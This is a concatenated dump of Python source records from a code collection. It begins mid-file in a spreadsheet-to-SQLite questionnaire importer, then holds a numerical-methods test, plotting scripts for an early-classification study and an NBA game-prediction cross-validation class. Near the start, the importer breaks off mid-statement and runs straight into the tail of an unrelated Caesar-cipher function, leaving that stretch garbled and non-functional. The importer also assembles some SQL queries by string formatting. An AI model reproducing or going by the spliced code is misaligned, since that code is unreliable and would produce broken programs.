regions_from_database=list(map(str.upper,regions_from_database ))\n regions_from_sheet=list(map(str.upper, self.regions_from_sheet ))\n return ( regions_from_database == regions_from_sheet )\n \n def insert_region_codes(self):\n \"\"\"Writes the regions from the sheet to the regions database.\n\n If the regions exist already in the database this function\n overwrites them.\n\n \"\"\"\n cursor=self.conn.cursor()\n administrative_divisions_variables=pre_vars['fixed_sheets']['Administrative divisions']\n sheet=self.wb.sheet_by_name('Administrative divisions')\n id_start_coordinates=indexes( administrative_divisions_variables['id_start'][0]) \n regions_index=list(map(int,sheet.col_values(id_start_coordinates[1],\\\n id_start_coordinates[0],\\\n id_start_coordinates[0]+self.nadm1)))\n\n sql_values=tuple(map(lambda x,y,z: (x,y,z, self.emco_year), [self.country_code] * self.nadm1 , regions_index, self.regions_from_sheet ))\n ## Adding national level\n sql_values = sql_values + ((self.country_code, 0, 'National level', self.emco_year),)\n cursor.executemany(\"INSERT OR REPLACE INTO REGIONS VALUES(?,?,?,?);\",sql_values)\n self.conn.commit()\n cursor.close()\n \n def get_regions(self):\n \"\"\"Returns a tupple with the names of the regions in order taken from the database.\n\n The regions are read from the database. If no regions are\n found in the database, this function returns False.\n \"\"\"\n cursor=self.conn.cursor()\n cursor.execute(\"SELECT ADM_NAME FROM REGIONS WHERE CO_CODE=? AND ADM_CODE>0 AND MC_YEAR=? ORDER BY ADM_CODE ASC;\",(self.country_code,self.emco_year) )\n sql_return=cursor.fetchall()\n cursor.close()\n if sql_return:\n sql_return=reduce(lambda x,y: x+y,sql_return)\n return(sql_return)\n else:\n return(False)\n \n def extract_table_comments(self):\n \"\"\"Extract the comments from the top of each table.\n \n This function can also be used with the edit mode.\n \"\"\"\n cursor=self.conn.cursor()\n comments_data=()\n cursor.execute(\"SELECT Tab,RM_TABLE,AC,EXL_REF FROM RM_Mapping_NonNumeric WHERE AC=\\\"Table_COMM\\\"\")\n comments_info=cursor.fetchall()\n for variables in comments_info:\n tab=variables[0]\n if tab in self.wb.sheet_names():\n rm_table=variables[1]\n exl_ref=variables[3]\n sheet = self.wb.sheet_by_name(tab)\n comments=sheet.cell(*indexes(exl_ref)).value\n if comments not in [\"Enter comment here\",\"Enter comment here\"]:\n comments_data=comments_data + ( (self.country_code,self.emco_year,rm_table,comments ), )\n cursor.executemany(\"INSERT OR REPLACE INTO EDU_COMMENT_TABLE_\"+self.database_type+\" VALUES(?,?,?,?);\",comments_data)\n self.conn.commit()\n cursor.close()\n\n \n def extract_data(self,write_sql=True):\n \"\"\"Reads and exports the data of the questionnaire.\n\n If the argument write_sql is True, it will import all the data\n to the sql database. Otherwise the data will be read but not\n stored (useful only for testing purposes).\n \"\"\"\n cursor=self.conn.cursor()\n # Tupples that will contain all the data\n meters_data=()\n inclu_data=()\n # For the sql file we use a set in order to avoid repetitions\n referenced_sql_code=set()\n\n def export_to_sqlite():\n \"\"\"Exports the data to the sqlite database.\n\n This function imports the values read from the\n questionnaire to the database and also adds them to the\n audit trail with the current timestamp.\n \"\"\"\n cursor=self.conn.cursor()\n ## Copy old values from\n \n if self.edit_mode:\n cursor.execute(\"DELETE FROM METER_AUDIT_TEMP\")\n for Table in self.wb.sheet_names():\n cursor.execute((\"INSERT INTO METER_AUDIT_TEMP (MC_ID, CO_CODE, ADM_CODE, MC_YEAR, \"\n \"EM_FIG_OLD, MQ_ID_OLD, MG_ID_OLD, USER_NAME, SERIES, SURVEY_ID) \"\n \"SELECT c.EMC_ID,c.CO_CODE, c.ADM_CODE, c.EMCO_YEAR,\"\n \"c.EM_FIG, c.MQ_ID, c.MG_ID, '{4}', '{5}', 'RM' from RM_MAPPING as a \"\n \"LEFT JOIN EDU_METER_AID AS b ON b.AC = a.AC \"\n \"JOIN EDU_METER97_{5} as c ON b.EMC_ID = c.EMC_ID \"\n \"WHERE a.Tab='{0}' AND c.CO_CODE = {1} AND \"\n \"(( c.EMCO_YEAR= {2} AND a.CUR_YEAR=0 ) OR ( c.EMCO_YEAR= {3} AND a.CUR_YEAR=-1))\".format(Table,self.country_code, self.emco_year,self.emco_year-1,self.username, self.database_type)))\n \n cursor.executemany(\"INSERT OR REPLACE INTO EDU_METER97_\"+ self.database_type +\" VALUES(?,?,?,?,?,?,?,?,?,?,?,?);\",meters_data)\n for var in referenced_sql_code:\n cursor.execute(var)\n self.conn.commit()\n \n if self.edit_mode:\n cursor.execute((\"INSERT INTO METER_AUDIT_TRAIL \" \n \"(MC_ID, CO_CODE, ADM_CODE, MC_YEAR, EM_FIG_OLD, MQ_ID_OLD, \"\n \"MG_ID_OLD, USER_NAME, SERIES, SURVEY_ID, EM_FIG_NEW, MQ_ID_NEW, MG_ID_NEW) \" \n \"SELECT a.MC_ID, a.CO_CODE, a.ADM_CODE, a.MC_YEAR,\" \n \"a.EM_FIG_OLD, a.MQ_ID_OLD, a.MG_ID_OLD,\" \n \"a.USER_NAME, a.SERIES, a.SURVEY_ID,\" \n \"b.EM_FIG, b.MQ_ID, b.MG_ID from METER_AUDIT_TEMP as a \"\n \"join EDU_METER97_\"+ self.database_type +\" as b on a.MC_ID = b.EMC_ID \"\n \"and a.CO_CODE = b.CO_CODE and a.ADM_CODE = b.ADM_CODE \"\n \"and a.MC_YEAR = b.EMCO_YEAR AND \"\n \"(a.EM_FIG_OLD !=b.EM_FIG OR a.MQ_ID_OLD != b.MQ_ID OR a.MG_ID_OLD != b.MG_ID)\"))\n cursor.execute(\"DELETE FROM METER_AUDIT_TEMP\")\n self.conn.commit()\n query_script=\"\"\n for Table in self.wb.sheet_names():\n query_script=query_script+\"\"\"INSERT INTO METER_AUDIT_TEMP (MC_ID, CO_CODE, ADM_CODE, MC_YEAR,EM_FIG_OLD, USER_NAME, SERIES, SURVEY_ID) SELECT EDU_INCLUSION_{5}.EMC_ID,EDU_INCLUSION_{5}.CO_CODE, EDU_INCLUSION_{5}.ADM_CODE, EDU_INCLUSION_{5}.EMCO_YEAR,EDU_INCLUSION_{5}.DESC_INCLU, '{4}', '{5}', 'RM' from RM_MAPPING LEFT JOIN EDU_METER_AID ON EDU_METER_AID.AC = RM_MAPPING.AC JOIN EDU_INCLUSION_{5} ON EDU_METER_AID.EMC_ID = EDU_INCLUSION_{5}.EMC_ID WHERE RM_MAPPING.Tab='{0}' AND EDU_INCLUSION_{5}.CO_CODE = {1} AND (( EDU_INCLUSION_{5}.EMCO_YEAR={2} AND RM_MAPPING.CUR_YEAR=0) OR (EDU_INCLUSION_{5}.EMCO_YEAR={3} AND RM_MAPPING.CUR_YEAR=-1));\\n\\n\"\"\".format(Table,self.country_code, self.emco_year,self.emco_year-1,self.username, self.database_type ) \n cursor.executescript(query_script)\n \n edit_sheets_names=self.wb.sheet_names()\n ## Before exporting the entries in the inclusion table of\n ## the sheets being imported are erased.\n inclu_table_name=\"EDU_INCLUSION_\"+self.database_type\n for sheet in self.wb.sheets():\n cursor.execute(\"SELECT {0}.CO_CODE,{0}.EMCO_YEAR,{0}.EMC_ID,RM_Mapping.Tab FROM {0} LEFT JOIN RM_MAPPING ON {0}.EMC_ID=RM_MAPPING.EMC_ID WHERE RM_Mapping.Tab=\\\"{3}\\\" AND ( ( {0}.EMCO_YEAR={1} AND RM_MAPPING.CUR_YEAR=0 ) OR ( {0}.EMCO_YEAR={2} AND RM_MAPPING.CUR_YEAR=-1) )\".format(inclu_table_name,self.emco_year,self.emco_year-1,sheet.name) )\n things_to_erase=cursor.fetchall()\n for values_to_erase in things_to_erase:\n cursor.execute(\"DELETE FROM EDU_INCLUSION_\"+self.database_type+\" WHERE CO_CODE={0} AND EMCO_YEAR={1} AND EMC_ID={2}\".format(values_to_erase[0],values_to_erase[1],values_to_erase[2]))\n self.conn.commit()\n\n cursor.executemany(\"INSERT OR REPLACE INTO EDU_INCLUSION_\"+self.database_type+\" VALUES(?,?,?,?,?,?);\",inclu_data)\n self.conn.commit()\n \n if self.edit_mode:\n cursor.execute((\"INSERT INTO METER_AUDIT_TRAIL \" \n \"(MC_ID, CO_CODE, ADM_CODE, MC_YEAR, EM_FIG_OLD, \"\n \"USER_NAME, SERIES, SURVEY_ID, EM_FIG_NEW) \" \n \"SELECT a.MC_ID, a.CO_CODE, a.ADM_CODE, a.MC_YEAR,\" \n \"a.EM_FIG_OLD, a.USER_NAME, a.SERIES, a.SURVEY_ID,\" \n \"b.DESC_INCLU from METER_AUDIT_TEMP as a \"\n \"join EDU_INCLUSION_{0} as b on a.MC_ID = b.EMC_ID \"\n \"and a.CO_CODE = b.CO_CODE and a.ADM_CODE = b.ADM_CODE \"\n \"and a.MC_YEAR = b.EMCO_YEAR AND \"\n \"(a.EM_FIG_OLD !=b.DESC_INCLU)\".format(self.database_type)))\n cursor.execute(\"DELETE FROM METER_AUDIT_TEMP\")\n self.conn.commit()\n cursor.close()\n\n def backup_imported_questionnaire():\n \"\"\"Puts a copy of the questionnaire in the Imports folder.\n \"\"\"\n import_folder=\"./Import\"\n if (not os.path.exists(import_folder)):\n os.makedirs(import_folder)\n shutil.copy(self.excel_file,\"./Import/RM_{}_{}_{}.xlsx\".format(self.country_name,self.emco_year,datetime.datetime.now().strftime(\"%y-%m-%d-%H-%M\")))\n \n\n # RM_TABLE is necessary for finding the xlrd coordinates\n cursor.execute(\"SELECT TAB, EXL_REF, EMC_ID,RM_TABLE,Col FROM RM_MAPPING;\") \n mapping_table = cursor.fetchall()\n if self.edit_mode:\n edit_sheets_names=self.wb.sheet_names()\n else:\n names_test=self.compare_region_names()\n ## names_test==False if the names do not match.\n if ( names_test==1 ):\n self.insert_region_codes()\n else:\n file=open(self.data_report_file,'a')\n self.validation_log_file=open(self.validation_full_path ,'a')\n print(\"\\nError: Unmatching region names between sheet and database.\",end='')\n file.write(\"General errors,\\n\")\n file.write(\"\\nError: Unmatching region names between sheet and database.,\")\n database_regions=self.get_regions()\n ## number of regions in database:\n dnr=len(database_regions)\n ## number of regions in sheet\n snr=len(self.regions_from_sheet)\n nregions=max(dnr,snr)\n print(\"\\nDatabase region names: Sheet region names:\\n\",end='')\n file.write(\"\\nDatabase region names:, Sheet region names:\\n\")\n for i in range(0,nregions):\n if (i 26:\n newIndex = newIndex - 27\n newChar = alphaList[newIndex]\n encodedString = encodedString + newChar\n return encodedString\n \ndef decodeMessage(inputString, cipherKey):\n alphaList = list(string.ascii_lowercase)\n alphaList.append(\" \")\n inputList = list(inputString)\n decodedString = \"\"\n for char in inputList:\n originalIndex = alphaList.index(char)\n newIndex = originalIndex - cipherKey\n newChar = alphaList[newIndex]\n decodedString = decodedString + newChar\n return decodedString","repo_name":"DanBresc/Website","sub_path":"app/caesarCipherBackEnd.py","file_name":"caesarCipherBackEnd.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40709712994","text":"import numpy as np\n\nfrom fealpy.pde.poisson_2d import CosCosData\nfrom fealpy.functionspace import ConformingVirtualElementSpace2d\nfrom fealpy.mesh.simple_mesh_generator import triangle\nfrom scipy.sparse.linalg import spsolve\n\nmaxit = 6\np = 2\npde = CosCosData()\ndomain = pde.domain()\nh = 0.2\nerror = np.zeros(maxit)\nfor i in range(maxit):\n print(i)\n mesh = triangle(domain, h, meshtype='polygon')\n space = ConformingVirtualElementSpace2d(mesh, p=p, q=p+3)\n M = space.mass_matrix()\n F = space.source_vector(pde.solution)\n\n uh = space.function()\n uh[:] = spsolve(M, F).reshape(-1)\n\n sh = space.project_to_smspace(uh)\n\n def efun(x, cellidx=None):\n return (pde.solution(x) - sh(x, cellidx))**2\n\n error[i] = space.integralalg.error(efun, power=np.sqrt)\n h /= 2\n\nprint(error[:-1]/error[1:])\n\n","repo_name":"weihuayi/fealpy","sub_path":"example/oldexample/test/oldtest/test_cvem_L2.py","file_name":"test_cvem_L2.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"}
+{"seq_id":"22856981992","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport shutil\nsns.set_style(\"white\")\n\nimport numpy as np\n\nPLOTS_PATH = \"png\"\nDATA_PATH = \"csv\"\n\ndef calc_loss(accuracy ,earliness ,alpha):\n return alpha * accuracy + (1 - alpha) * (earliness)\n\ndef plot(df_a, col_a, df_b, col_b, xlabel=\"\", ylabel=\"\", title=\"\",\n fig=None, ax=None, textalpha=1, errcol=None, diagonal=True, hue=None, cbar_label=\"\"):\n\n if df_a.equals(df_b):\n concated = df_a\n else:\n concated = pd.concat([df_a, df_b], axis=1, join='inner')\n\n if hue is not None:\n hue.name = \"color\"\n hue.index.names = ['dataset']\n concated[\"color\"] = hue\n\n # features in consistent sequence to datasets\n hue = concated[\"color\"]\n\n X = concated[col_a]\n Y = concated[col_b]\n if errcol is not None:\n err = concated[errcol]\n else:\n err = None\n text = df_a.index\n\n if fig is None:\n fig, ax = plt.subplots(figsize=(16, 8))\n\n sns.despine(fig, offset=5)\n\n if err is None:\n sc = ax.scatter(X, Y, c=hue)\n\n if hue is not None:\n cbar = plt.colorbar(sc)\n cbar.set_label(cbar_label, rotation=270)\n else:\n ax.errorbar(X, Y, xerr=err, fmt='o', alpha=0.5)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.set_xlim(0, 1.1)\n ax.set_ylim(0, 1.1)\n ax.set_title(title)\n\n if diagonal:\n # diagonal line\n ax.plot([0, 1], [0, 1])\n ax.grid()\n\n xy = pd.concat([X, Y], axis=1)\n xy.columns = [\"X\", \"Y\"]\n\n for row in xy.iterrows():\n txt, (xval, yval) = row\n ax.annotate(txt, (xval + 0.01, yval + 0.01), fontsize=12, alpha=textalpha)\n\n return fig, ax\n\ndef load_mori(alpha, mori_accuracy, mori_earliness):\n A = pd.read_csv(mori_accuracy, sep=' ').set_index(\"Dataset\")\n E = pd.read_csv(mori_earliness, sep=' ').set_index(\"Dataset\") * 0.01\n return A[\"a={}\".format(alpha)], E[\"a={}\".format(alpha)]\n\ndef load_relclass(alpha, relclass_accuracy, relclass_earliness):\n\n if alpha == 0.6:\n column = \"t=0.001\"\n elif alpha == 0.7:\n column = \"t=0.1\"\n elif alpha == 0.8:\n column = \"t=0.5\"\n elif alpha == 0.9:\n column = \"t=0.9\"\n else:\n raise ValueError()\n\n accuracy = pd.read_csv(relclass_accuracy, sep=' ').set_index(\"Dataset\")[column] # accuracy is scaled 0-1\n earliness = pd.read_csv(relclass_earliness, sep=' ').set_index(\"Dataset\")[\n column] * 0.01 # earliness is scaled 1-100\n return accuracy, earliness\n\ndef plot_accuracyearliness_sota_experiment(ptsepsilon=10,\n entropy_factor=0.01,\n compare=\"mori\",\n csvfile = \"data/sota_comparison/runs.csv\",\n metafile=\"data/UCR_Datasets/DataSummary.csv\",\n mori_accuracy=\"data/morietal2017/mori-accuracy-sr2-cf2.csv\",\n mori_earliness=\"data/morietal2017/mori-earliness-sr2-cf2.csv\",\n relclass_accuracy=\"data/morietal2017/relclass-accuracy-gaussian-quadratic-set.csv\",\n relclass_earliness=\"data/morietal2017/relclass-earliness-gaussian-quadratic-set.csv\"):\n df = pd.read_csv(csvfile)\n\n meta = pd.read_csv(metafile).set_index(\"Name\")\n\n for alpha in [0.6, 0.7, 0.8, 0.9]:\n data = df.loc[df[\"earliness_factor\"] == alpha].set_index(\"dataset\")\n data = data.loc[data[\"ptsepsilon\"] == ptsepsilon]\n data = data.loc[data[\"entropy_factor\"] == entropy_factor]\n\n if len(data) == 0:\n print(\"No runs found for a{} b{} e{}... skipping\".format(alpha, entropy_factor, ptsepsilon))\n continue\n\n cost = calc_loss(data[\"accuracy\"],1-data[\"earliness\"],alpha)\n\n # average multiple runs\n data[\"ours\"] = cost.groupby(cost.index).mean()\n #load_approaches\n\n\n\n #df = load_approaches(alpha=0.6,relclass_col=\"t=0.001\",edsc_col=\"t=2.5\",ects_col=\"sup=0.05\")\n if compare==\"relclass\":\n accuracy, earliness = load_relclass(alpha, relclass_accuracy, relclass_earliness)\n elif compare==\"mori\":\n accuracy, earliness = load_mori(alpha, mori_accuracy, mori_earliness)\n\n data[\"mori\"] = calc_loss(accuracy,1-earliness,alpha)\n\n fig, ax = plot(data, \"ours\", data, \"mori\", xlabel=\"accuracy and earliness Ours (Phase 2)\",\n ylabel=compare + r\"SR2-CF2$\", hue=np.log10(meta[\"Train\"]),\n cbar_label=\"log # training samples\",\n title=r\"accuracy and earliness $\\alpha={}$\".format(alpha))\n\n fname = os.path.join(PLOTS_PATH,compare, \"sota_{}_a{}_b{}_e{}.png\".format(\"accuracyearliness\", alpha, entropy_factor, ptsepsilon))\n os.makedirs(os.path.dirname(fname),exist_ok=True)\n print(\"writing \" + fname)\n fig.savefig(fname)\n plt.clf()\n\n fname = os.path.join(DATA_PATH, compare,\"accuracyearliness_alpha{}.csv\".format(alpha))\n os.makedirs(os.path.dirname(fname), exist_ok=True)\n print(\"writing \" + fname)\n data[[\"ours\", \"mori\"]].to_csv(fname)\n\ndef plot_accuracy_sota_experiment(ptsepsilon=10,\n entropy_factor=0.01,\n compare=\"mori\",\n csvfile = \"data/sota_comparison/runs.csv\",\n metafile=\"data/UCR_Datasets/DataSummary.csv\",\n mori_accuracy=\"data/morietal2017/mori-accuracy-sr2-cf2.csv\",\n mori_earliness=\"data/morietal2017/mori-earliness-sr2-cf2.csv\",\n relclass_accuracy=\"data/morietal2017/relclass-accuracy-gaussian-quadratic-set.csv\",\n relclass_earliness=\"data/morietal2017/relclass-earliness-gaussian-quadratic-set.csv\"):\n\n data = pd.read_csv(csvfile).set_index(\"dataset\")\n data = data.loc[data[\"ptsepsilon\"] == ptsepsilon]\n data = data.loc[data[\"entropy_factor\"] == entropy_factor]\n\n meta = pd.read_csv(metafile).set_index(\"Name\")\n\n\n for alpha in [0.6, 0.7, 0.8, 0.9]:\n df = data.loc[data[\"earliness_factor\"] == alpha]\n\n summary = pd.DataFrame()\n for objective in [\"accuracy\", \"earliness\"]:\n\n ours = df.loc[df[\"earliness_factor\"]==alpha]\n if len(ours) == 0:\n print(\"No runs found for a{} b{} e{}... skipping\".format(alpha, entropy_factor, ptsepsilon))\n continue\n\n if compare == \"relclass\":\n accuracy, earliness = load_relclass(alpha, relclass_accuracy, relclass_earliness)\n elif compare == \"mori\":\n accuracy, earliness = load_mori(alpha, mori_accuracy, mori_earliness)\n\n other = pd.DataFrame()\n if objective == \"accuracy\":\n ours[\"accuracy\"] = ours[\"accuracy\"]\n other[\"a={}\".format(alpha)] = accuracy\n summary[\"ours\"] = ours[\"accuracy\"]\n summary[\"mori\"] = accuracy\n\n elif objective == \"earliness\":\n other[\"a={}\".format(alpha)] = earliness\n ours[\"earliness\"] = ours[\"earliness\"]\n summary[\"mori\"] = other\n\n fig, ax = plot(ours, objective, other, \"a={}\".format(alpha), xlabel=objective+\" Ours (Phase 2)\",\n ylabel=compare + r\" SR2-CF2$\", title=objective + r\" $\\alpha={}$\".format(alpha),\n hue=np.log10(meta[\"Train\"]), cbar_label=\"log # training samples\")\n\n fname = os.path.join(PLOTS_PATH, compare, \"sota_{}_a{}_b{}_e{}.png\".format(objective,alpha, entropy_factor, ptsepsilon))\n os.makedirs(os.path.dirname(fname), exist_ok=True)\n print(\"writing \" + fname)\n fig.savefig(fname)\n plt.clf()\n\n fname = os.path.join(DATA_PATH,compare,\"{}_alpha{}.csv\".format(objective,alpha))\n os.makedirs(os.path.dirname(fname), exist_ok=True)\n print(\"writing \" + fname)\n summary[[\"ours\", \"mori\"]].to_csv(fname)\n\n\ndef qualitative_figure(csvfile = \"data/sota_comparison/runs.csv\", compare_accuracy=\"data/morietal2017/mori-accuracy-sr2-cf2.csv\", compare_earliness=\"data/morietal2017/mori-earliness-sr2-cf2.csv\"):\n\n df = pd.read_csv(csvfile)\n df = df.loc[df.entropy_factor == 0]\n df = df.loc[df.ptsepsilon == 0]\n\n\n mori_accuracy = pd.read_csv(compare_accuracy, sep=' ').set_index(\"Dataset\")\n mori_earliness = pd.read_csv(compare_earliness, sep=' ').set_index(\"Dataset\")\n\n all_datasets = df[\"dataset\"].unique()\n #selected_datasets = [\"TwoPatterns\", \"Yoga\", \"Adiac\", \"UWaveGestureLibraryY\", \"FaceAll\"]\n selected_datasets = all_datasets\n\n mori = pd.DataFrame()\n for dataset in selected_datasets:\n\n fig, ax = plt.subplots(figsize=(30, 16))\n\n mori[\"accuracy\"] = mori_accuracy.loc[dataset]\n mori[\"earliness\"] = mori_earliness.loc[dataset] * 0.01\n ax.plot(mori[\"accuracy\"], mori[\"earliness\"], linestyle='--', marker='+')\n\n #df3 = df3[~df3.index.duplicated(keep='first')]\n sample = df.loc[df[\"dataset\"] == dataset].sort_values(by=\"earliness_factor\")\n sample = sample.groupby(\"earliness_factor\").mean()\n ax.plot(sample[\"accuracy\"], sample[\"earliness\"], linestyle='--', marker='o')\n ax.set_xlabel(\"accuracy\")\n ax.set_ylabel(\"earliness\")\n #\n\n X = sample[\"accuracy\"].iloc[0]\n Y = sample[\"earliness\"].iloc[0]\n ax.annotate(\"our \" + dataset, xy=(X, Y), xytext=(X, Y))\n\n X = mori[\"accuracy\"].iloc[0]\n Y = mori[\"earliness\"].iloc[0]\n ax.annotate(dataset, xy=(X, Y), xytext=(X, Y))\n\n fname = DATA_PATH + \"/alphas_our_{}.csv\".format(dataset)\n print(\"writing \" + fname)\n sample.to_csv(fname)\n\n fname = DATA_PATH + \"/alphas_mori_{}.csv\".format(dataset)\n print(\"writing \" + fname)\n mori.to_csv(fname)\n\n fname = os.path.join(PLOTS_PATH, \"earlinessaccuracy\", \"{}.png\".format(dataset))\n os.makedirs(os.path.dirname(fname),exist_ok=True)\n print(\"writing \" + fname)\n fig.savefig(fname)\n plt.clf()\n\ndef plot_scatter(csvfile=\"data/sota_comparison/runs.csv\",\n metafile=\"data/UCR_Datasets/DataSummary.csv\",\n mori_accuracy=\"data/morietal2017/mori-accuracy-sr2-cf2.csv\",\n mori_earliness=\"data/morietal2017/mori-earliness-sr2-cf2.csv\",\n relclass_accuracy=\"data/morietal2017/relclass-accuracy-gaussian-quadratic-set.csv\",\n relclass_earliness=\"data/morietal2017/relclass-earliness-gaussian-quadratic-set.csv\"):\n\n for compare in [\"mori\",\"relclass\"]:\n\n for ptsepsilon in [0,5,10,50]:\n for entropy_factor in [0,0.01, 0.1]:\n plot_accuracyearliness_sota_experiment(ptsepsilon=ptsepsilon,\n entropy_factor=entropy_factor,\n compare=compare,\n csvfile=csvfile,\n metafile=metafile,\n mori_accuracy=mori_accuracy,\n mori_earliness=mori_earliness,\n relclass_accuracy=relclass_accuracy,\n relclass_earliness=relclass_earliness)\n\n plot_accuracy_sota_experiment(ptsepsilon=ptsepsilon,\n entropy_factor=entropy_factor,\n compare=compare,\n csvfile=csvfile,\n metafile=metafile,\n mori_accuracy=mori_accuracy,\n mori_earliness=mori_earliness,\n relclass_accuracy=relclass_accuracy,\n relclass_earliness=relclass_earliness)\n\ndef cleanup():\n thisdir=os.path.dirname(os.path.realpath(__file__))\n\n if os.path.exists(os.path.join(thisdir, DATA_PATH)):\n print(\"deleting csv data in \"+os.path.join(thisdir, DATA_PATH))\n shutil.rmtree(os.path.join(thisdir, DATA_PATH))\n if os.path.exists(os.path.join(thisdir, PLOTS_PATH)):\n print(\"deleting png plots in \" + os.path.join(thisdir, PLOTS_PATH))\n shutil.rmtree(os.path.join(thisdir, PLOTS_PATH))\n\nif __name__==\"__main__\":\n cleanup()\n\n csvfile = \"../data/runs_conv1d.csv\"\n metafile = \"../data/UCR_Datasets/DataSummary.csv\"\n mori_accuracy = \"../data/UCR_Datasets/mori-accuracy-sr2-cf2.csv\"\n mori_earliness = \"../data/UCR_Datasets/mori-earliness-sr2-cf2.csv\"\n relclass_accuracy = \"../data/UCR_Datasets/relclass-accuracy-gaussian-quadratic-set.csv\"\n relclass_earliness = \"../data/UCR_Datasets/relclass-earliness-gaussian-quadratic-set.csv\"\n\n plot_scatter(csvfile, metafile, mori_accuracy, mori_earliness, relclass_accuracy, relclass_earliness)\n\n qualitative_figure(csvfile,\n compare_accuracy=mori_accuracy,\n compare_earliness=mori_earliness)\n\n","repo_name":"rtavenar/elects","sub_path":"viz/viz.py","file_name":"viz.py","file_ext":"py","file_size_in_byte":13476,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"}
+{"seq_id":"18164591725","text":"import torch\nfrom torch.utils.data.dataset import Dataset\nfrom torch.utils.data import DataLoader, random_split\n\nfrom pytorch_lightning import LightningModule, Trainer, seed_everything\nfrom pytorch_lightning.loggers import CSVLogger\nfrom pytorch_lightning.callbacks import Callback, ModelCheckpoint, EarlyStopping\n\nimport torchmetrics\nfrom torchmetrics import Accuracy\n\nimport pandas as pd\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport _pickle\nimport os\n\nGPU_indx = 0\ndevice = torch.device(GPU_indx if torch.cuda.is_available() else 'cpu')\nprint('device: ', device)\n\n\n# In[ ]:\n\n\nfrom model import PlayerLevelCNN\nfrom dataset import NBAPlayerData\n\n\n# In[ ]:\n\n\nclass CustomCrossValidation(object):\n def __init__(self, df, i=10):\n self.seasons = ['22008', '22009', '22010', '22011', '22012', '22013', '22014',\n '22015', '22016', '22017', '22018', '22019', '22020', '22021', \n '22022']\n self.fold_slice = i\n \n self.df = df.copy()\n \n def _get_split(self, get_half):\n '''\n get half is for having observations that belong to the same season \n both in train and validation sets, thereby to reduce the impact of\n a possible domain shift\n '''\n train_set = self._get_train_set(get_half)\n valid_set = self._get_valid_set(get_half)\n return train_set, valid_set\n \n def _get_train_set(self, get_half=False):\n res = self.df[self.df['SEASON_ID'].isin(self.seasons[:self.fold_slice])]\n if get_half:\n next_season = self.df[self.df['SEASON_ID']==self.seasons[self.fold_slice]].reset_index(drop=True)\n res = pd.concat([res, next_season.iloc[:len(next_season)//2]])\n return res\n \n def _get_valid_set(self, get_half=False):\n res = self.df[self.df['SEASON_ID']==self.seasons[self.fold_slice]]\n if get_half:\n res = res.reset_index(drop=True).iloc[len(res)//2:]\n return res\n \n def _slide(self):\n if self.fold_slice + 1 < len(self.seasons):\n self.fold_slice += 1\n else:\n return True\n \n def _prepare_data_loaders(self, get_half):\n BATCH_SIZE = 256\n NUM_WORKERS = 0\n \n df_tr, df_val = self._get_split(get_half)\n print(f\"train set range {df_tr['GAME_DATE'].min()} - {df_tr['GAME_DATE'].max()}\")\n print(f\"valid set range {df_val['GAME_DATE'].min()} - {df_val['GAME_DATE'].max()}\")\n \n train_set = NBAPlayerData(df_tr, scaler='fit')\n train_loader = DataLoader(train_set, shuffle=True, batch_size=BATCH_SIZE, num_workers=NUM_WORKERS)\n\n val_set = NBAPlayerData(df_val, scaler=train_set.scaler)\n val_loader = DataLoader(val_set, shuffle=False, batch_size=BATCH_SIZE, num_workers=NUM_WORKERS)\n\n data_loaders = [train_loader, val_loader]\n return data_loaders\n \n def _fit_model(self, model_params, data_loaders):\n model = PlayerLevelCNN(model_id='trial_model', data_loaders=data_loaders, hyperparams=model_params, seed=30)\n \n checkpoint_callback = ModelCheckpoint(monitor=\"val_loss\",\n dirpath=\"cv_logs/\",\n save_top_k=1,\n mode=\"min\",\n every_n_epochs=1)\n\n early_stopping = EarlyStopping('val_loss', patience = 5, mode='min') \n\n trainer = Trainer(\n accelerator=\"auto\",\n devices=1 if torch.cuda.is_available() else None, \n max_epochs=5,\n callbacks=[checkpoint_callback, early_stopping],\n logger=CSVLogger(save_dir=\"cv_logs/\"),\n deterministic=True\n )\n trainer.fit(model)\n result = trainer.validate(model)\n return result, model\n \n def _predict_val_set(self, model, val_loader):\n predictions = {}\n \n val_loader_iter = iter(val_loader)\n for i in range(len(val_loader)):\n stats, momentum, odds, target, game_ids = next(val_loader_iter)\n batch_preds = model.predict_step(stats, momentum, odds, predict_label=True)\n predictions.update({'00'+str(int(game_ids[i])):bool(batch_preds[i]) for i in range(len(batch_preds))})\n \n return predictions\n\n def _get_updated_df(self):\n # update the duplicated game_ids\n keys_to_change = []\n for k, v in self.all_predictions.items():\n if len(k) > 10:\n keys_to_change.append(k)\n for k in keys_to_change:\n self.all_predictions[k[:-1] + '_2'] = self.all_predictions[k]\n self.all_predictions.pop(k)\n\n predicted_df = self.df.copy()\n predicted_df['cv_pred'] = predicted_df['GAME_ID'].map(self.all_predictions)\n predicted_df.dropna(subset='cv_pred', inplace=True)\n predicted_df = predicted_df[['GAME_ID', 'GAME_DATE', 'SEASON_ID', 'home_team',\n 'away_team', 'TEAM_A_WIN', 'cv_pred']]\n self.predicted_df = predicted_df\n \n def fit_predict(self, model_params, get_half):\n \n self.all_predictions = {}\n self.fold_scores = []\n j = 0\n while True:\n print(j)\n data_loaders = self._prepare_data_loaders(get_half)\n \n result, model = self._fit_model(model_params, data_loaders)\n self.fold_scores.append(result)\n \n predictions = self._predict_val_set(model, data_loaders[1])\n self.all_predictions.update(predictions)\n \n if self._slide():\n break\n j += 1\n print()\n \n self._get_updated_df()\n return self.predicted_df\n\n","repo_name":"utkuboyar/nba_match_outcome_prediction","sub_path":"pre_deployment/custom_cross_validation.py","file_name":"custom_cross_validation.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
